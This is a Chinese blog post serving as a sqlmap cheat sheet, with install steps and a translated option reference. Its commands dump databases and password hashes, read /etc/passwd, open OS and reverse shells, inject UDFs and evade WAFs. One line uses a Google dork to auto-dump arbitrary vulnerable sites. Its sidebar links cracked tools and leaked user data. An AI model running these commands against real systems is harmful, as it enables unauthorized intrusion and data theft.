笔记:SQLMAP常用参数讲解
本文共计 6745 字,感谢您的耐心浏览与评论.
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数据库类型
sqlmap -u “http://url/news?id=1″ –users #列数据库用户
sqlmap -u “http://url/news?id=1″ –dbs#列数据库
sqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码
sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码
sqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”
–start 1 –stop 20 #列出指定字段,列出20 条
sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表
sqlmap -u “http://url/news?id=1″ –privileges #查看权限
sqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)
sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录
sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
sqlmap -u “http://url/news?id=1″ -b #获取banner信息
sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入
sqlmap -u “http://url/news?id=1″ -v 1 -f #指纹判别数据库类型
sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入
sqlmap -u “http://url/news?id=1″ –string”STRING_ON_TRUE_PAGE”# 指 定关键词
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令
sqlmap -u “http://url/news?id=1″ –file /etc/passwd
sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令
sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表
sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度
sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度
***********高级用法*************
-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问
–technique 测试指定注入类型\使用的技术
不加参数默认测试所有注入技术
• B: 基于布尔的SQL 盲注
• E: 基于显错sql 注入
• U: 基于UNION 注入
• S: 叠层sql 注入
• T: 基于时间盲注
–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
–tamper 插件所在目录
\sqlmap-dev\tamper
sqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users –smart 智 能
level 执行测试等级 攻击实例:
Sqlmap -u “http://url/news?id=1&Submit=Submit”
–cookie=”PHPSESSID=41aa833e6d0d
28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user
–password
参考文档:http://sqlmap.sourceforge.net/doc/README.html
***********安装最新版本*************
ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
sudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件
sudo vim /home/当前用户/.bashrc
#任意位置加上:
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效
如果想对所有用户有效 可设置全局 编辑下面的文件
vim /etc/profile
同样加上:
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
******************windows 7 (x64) sqlmap install (SVN)************
http://www.python.org/getit/ 安装python
http://www.sliksvn.com/en/download 安装windows svn client
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
安装sqlmap
*修改环境变量
–version 显示程序的版本号并退出
-h, –help 显示此帮助消息并退出
-v VERBOSE 详细级别:0-6(默认为1)
Target(目标): 以下至少需要设置其中一个选项,设置目标URL。
-d DIRECT 直接连接到数据库。
-u URL, –url=URL 目标URL。
-l LIST 从Burp 或WebScarab 代理的日志中解析目标。
-r REQUESTFILE 从一个文件中载入HTTP 请求。
-g GOOGLEDORK 处理Google dork 的结果作为目标URL。
-c CONFIGFILE 从INI 配置文件中加载选项。
Request(请求)::
这些选项可以用来指定如何连接到目标URL。
–data=DATA 通过POST 发送的数据字符串
–cookie=COOKIE HTTP Cookie 头
–cookie-urlencode URL 编码生成的cookie 注入
–drop-set-cookie 忽略响应的Set –Cookie 头信息
–user-agent=AGENT 指定 HTTP User –Agent 头
–random-agent 使用随机选定的HTTP User –Agent 头
–referer=REFERER 指定 HTTP Referer 头
–headers=HEADERS 换行分开,加入其他的HTTP 头
–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)
–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)
–proxy=PROXY 使用HTTP 代理连接到目标URL
–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)
–ignore-proxy 忽略系统默认的HTTP 代理
–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒
–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)
–retries=RETRIES 连接超时后重新连接的时间(默认3)
–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
–safe-url=SAFURL 在测试过程中经常访问的url 地址
–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL
Optimization(优化): 这些选项可用于优化SqlMap 的性能。
-o 开启所有优化开关
–predict-output 预测常见的查询输出
–keep-alive 使用持久的HTTP(S)连接
–null-connection 从没有实际的HTTP 响应体中检索页面长度
–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)
Injection(注入):
这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
-p TESTPARAMETER 可测试的参数(S)
–dbms=DBMS 强制后端的DBMS 为此值
–os=OS 强制后端的DBMS 操作系统为这个值
–prefix=PREFIX 注入payload 字符串前缀
–suffix=SUFFIX 注入 payload 字符串后缀
–tamper=TAMPER 使用给定的脚本(S)篡改注入数据
Detection(检测):
这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。
–level=LEVEL 执行测试的等级(1-5,默认为1)
–risk=RISK 执行测试的风险(0-3,默认为1)
–string=STRING 查询时有效时在页面匹配字符串
–regexp=REGEXP 查询时有效时在页面匹配正则表达式
–text-only 仅基于在文本内容比较网页
Techniques(技巧): 这些选项可用于调整具体的SQL 注入测试。
–technique=TECH SQL 注入技术测试(默认BEUST)
–tiime-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒)
–union-cols=UCOLS 定列范围用于测试UNION 查询注入
–union-char=UCHAR 用于暴力猜解列数的字符
Fingerprint(指纹):
-f, –fingerprint 执行检查广泛的DBMS 版本指纹
Enumeration(枚举):
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
-b, –banner 检索数据库管理系统的标识
–current-user 检索数据库管理系统当前用户
–current-db 检索数据库管理系统当前数据库
–is-dba 检测DBMS 当前用户是否DBA
–users 枚举数据库管理系统用户
–passwords 枚举数据库管理系统用户密码哈希
–privileges 枚举数据库管理系统用户的权限
–roles 枚举数据库管理系统用户的角色
–dbs 枚举数据库管理系统数据库
–tables 枚举的DBMS 数据库中的表
–columns 枚举DBMS 数据库表列
–dump 转储数据库管理系统的数据库中的表项
–dump-all 转储所有的DBMS 数据库表中的条目
–search 搜索列(S),表(S)和/或数据库名称(S)
-D DB 要进行枚举的数据库名
-T TBL 要进行枚举的数据库表
-C COL 要进行枚举的数据库列
-U USER 用来进行枚举的数据库用户
–exclude-sysdbs 枚举表时排除系统数据库
–start=LIMITSTART 第一个查询输出进入检索
–stop=LIMITSTOP 最后查询的输出进入检索
–first=FIRSTCHAR 第一个查询输出字的字符检索
–last=LASTCHAR 最后查询的输出字字符检索
–sql-query=QUERY 要执行的SQL 语句
–sql-shell 提示交互式SQL 的shell
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。
–common-tables 检查存在共同表
–common-columns 检查存在共同列
User-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。
–udf-inject 注入用户自定义函数
–shared-lib=SHLIB 共享库的本地路径
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
–file-read=RFILE 从后端的数据库管理系统文件系统读取文件
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。
–os-cmd=OSCMD 执行操作系统命令
–os-shell 交互式的操作系统的shell
–os-pwn 获取一个OOB shell,meterpreter 或VNC
–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC
–os-bof 存储过程缓冲区溢出利用
–priv-esc 数据库进程用户权限提升
–msf-path=MSFPATH Metasploit Framework 本地的安装路径
–tmp-path=TMPPATH 远程临时文件目录的绝对路径
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。
–reg-read 读一个Windows 注册表项值
–reg-add 写一个Windows 注册表项值数据
–reg-del 删除Windows 注册表键值
–reg-key=REGKEY Windows 注册表键
–reg-value=REGVAL Windows 注册表项值
–reg-data=REGDATA Windows 注册表键值数据
–reg-type=REGTYPE Windows 注册表项值类型
General(一般): 这些选项可以用来设置一些一般的工作参数。
-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中
-s SESSIONFILE 保存和恢复检索会话文件的所有数据
–flush-session 刷新当前目标的会话文件
–fresh-queries 忽略在会话文件中存储的查询结果
–eta 显示每个输出的预计到达时间
–update 更新SqlMap
–save file 保存选项到INI 配置文件
–batch 从不询问用户输入,使用所有默认配置。
Miscellaneous(杂项):
–beep 发现SQL 注入时提醒
–check-payload IDS 对注入payloads 的检测测试
–cleanup SqlMap 具体的UDF 和表清理DBMS
–forms 对目标URL 的解析和测试形式
–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果
–page-rank Google dork 结果显示网页排名(PR)
–parse-errors 从响应页面解析数据库管理系统的错误消息
–replicate 复制转储的数据到一个sqlite3 数据库
–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
–wizard 给初级用户的简单向导界面
标签: 渗透测试 黑客 SQL SQL注入 sqlmap 脱裤
转载:转载请注明原文链接 - 笔记:SQLMAP常用参数讲解
日历
最新评论
- Mrxn @暂无: 感谢测试
- Mrxn @219.134.216.*: 别用 postman 用 b...
- 116.7.98.* 太强了一套操作下来恍然大悟红红火火恍恍惚惚
- 今日热搜 文章不错支持一下
- 219.134.216.* 老哥,我忘记防火墙密码,用您的方法试了下,用POSTMAN提...
- 暂无 Web漏扫软件 AppScan 10.0.0 破解版本下载 ...
- 暂无 @Mrxn: 已经测试,window update 更新,更...
- 暂无 win7虚拟,替换完dll,双击运行后报错“无法载入许可证”...
- 暂无 @Mrxn: win7 64位开始也是报错,后面做了wind...
- 热搜 文章不错支持一下
最新文章
随机文章
- 慢慢的,他们就没有了,就像未存在过【转】
- 从12306信息泄露了解何为黑客撞库拖库洗库
- 江湖险恶 如何设置安全又方便的个人密码
- 在Windows平台下搭建WiFi蜜罐小计(附工具下载)
- 123O6的裤子 懂得进 不懂得别比比 望大家珍重啊
- MySQL注入绕过新思路
- 12306网站用户数据泄露:用户帐号密码身份证邮箱疯传
- 2014圣诞祝福-可以自定义好友名字的祝福-个性十足
- 第二个百度网盘,上传天朝禁止的东西的好地方!
- 剖析中国菜刀第二部分
- BurpSuite Pro破解版[BurpSuite Cracked version]+汉化脚本(windows)+常用插件(sqlmap.jar,bypasswaf.jar等)分享
- 剖析中国菜刀第一部分
- Scanning is art - Nmap 扫描的艺术之常见的基本操作
- 时隔这么久,菜刀再次更新--中国菜刀20141213新版发布--强大的网站管理工具
- PHP性能优化
分类
标签
-
破解
编程
代码
路由器
密码
wifi
攻击
渗透测试
黑客电影
wireshark
抓包
隐私窃取
Kali
谷歌
查资料
防火墙
google
avast
杀毒软件
许可文件
黑客
XSS
apt
钓鱼
脚本
shell
黑客工具
分享
安卓软件
网络安全
SQL
VPNgate
Youtube
VPN
Linux
母亲
自己
人生
USB攻击
Ubuntu
Metasploit
Python
JS
discuz
漏洞
社会
加密通讯
防范
撞库
cain
12306
php
祝福
web安全
扫描
emlog
社工
SEO
cmd
Windows优化
伪静态
命运
病毒
windows
bat
批处理
乱码
html
.net
IP代理
木马
C#
苹果
移动支付
文字特效
标记
emlog头像
宽带叠加
网速叠加
sim
省流量
搜索
DDOS
微信
Supervisor
emlog搬家
黑帽
新闻
绿色资源
md5
收费md5
DNS解析
花刺代理
H-scan
Telnet
注册表
vf
注册机
Netsparker
IDM
下载器
中国移动
流量
激活码
微软
黑客部队
盗号
ATM
QQ安全
孤独
爱
超级QQ
sitemap
标签
nikto
游玩
逆向
入侵
NFC
维基
后门
一句话
多说
css
wamp
crx
flashxp
SQL注入
Bruter
跨站
waf
nmap
kindeditor
移动免流
电信免流
联通免流
二维码
免流ip
免流
数据恢复
火狐
启动
cve
QQ
显示ip
源码
avira
dvwa
csrf
百度
mrxn
http
rtmp
新东方
百度网盘
盗墓笔记
MySQL
闪客精灵
tips
数据库
生活
表白
汇编
DHCP
子网划分
组策略
代码审计
性能优化
ARP劫持
百度知道
腾讯
音乐
格式化
GoAgent
双系统安装
ajax
pjax
pushState
html5
cdn
ssl
https
bug
AIDE
360
nginx
vps
运维
openss
rewrite
location
网警
主机
lnmp
IE
tcp
加密
sqlmap
脱裤
浏览器主页防护
windows7
Joomla
USB
sublime
phpfmt
emlog插件
刷机
小米
电影
centos
API
接口
Java
c语言
自由浏览器
旅行
cuteftp
vmware
注册码
license
key
win10
绕过
IPSEC
IKEV2
验证码
badusb
社工库
github
git
浏览器崩溃
redis
算法
chrome
burpsuite
机器人
jQuery
namp
子域挖掘
AMD
写作
JavaScript
android
shc
windows10
easybcd
引导
面试
匿名
蠕虫
比特币
挖矿
find
nessus
scan
编译
lrzsz
工具
FTP
靶场
中间人
排序
密钥
grep
cut
awk
sed
勒索
解密
教程
过狗
FileOptimizer
Guetzli
0day
office
exploit
正则
phpcms
exp
科学上网
开源
Intel
poc
WordPress
认证绕过
函数
代理
劫持
浏览器
wpa2
下载
rar
压缩
解压
mimikatz
杂谈
docker
提权
suid
shadowsocks
ipv6
电源
英语
nextcloud
爬虫
chmod
权限
耳机
华为
硬件
装机
主板
内存
office激活
Oracle
Jetbrains激活
cmd乱码
阿里云
暗网
油猴脚本
CMS识别
指纹识别
编码
hackbar
Thinkphp
getshell
CobaltStrike
rce
BIOS
华硕
TeamViewer
FCKeditor
xml注入
navicat
Acunetix
AWS
powershell
haproxy
WeChatDownload
未授权
列目录
任意文件读取
xray
这么多参数,看的我头晕,博主厉害啊
@御坂网络:额 你用用就知道了 其实这不算多 都是基本常用的命令
发表评论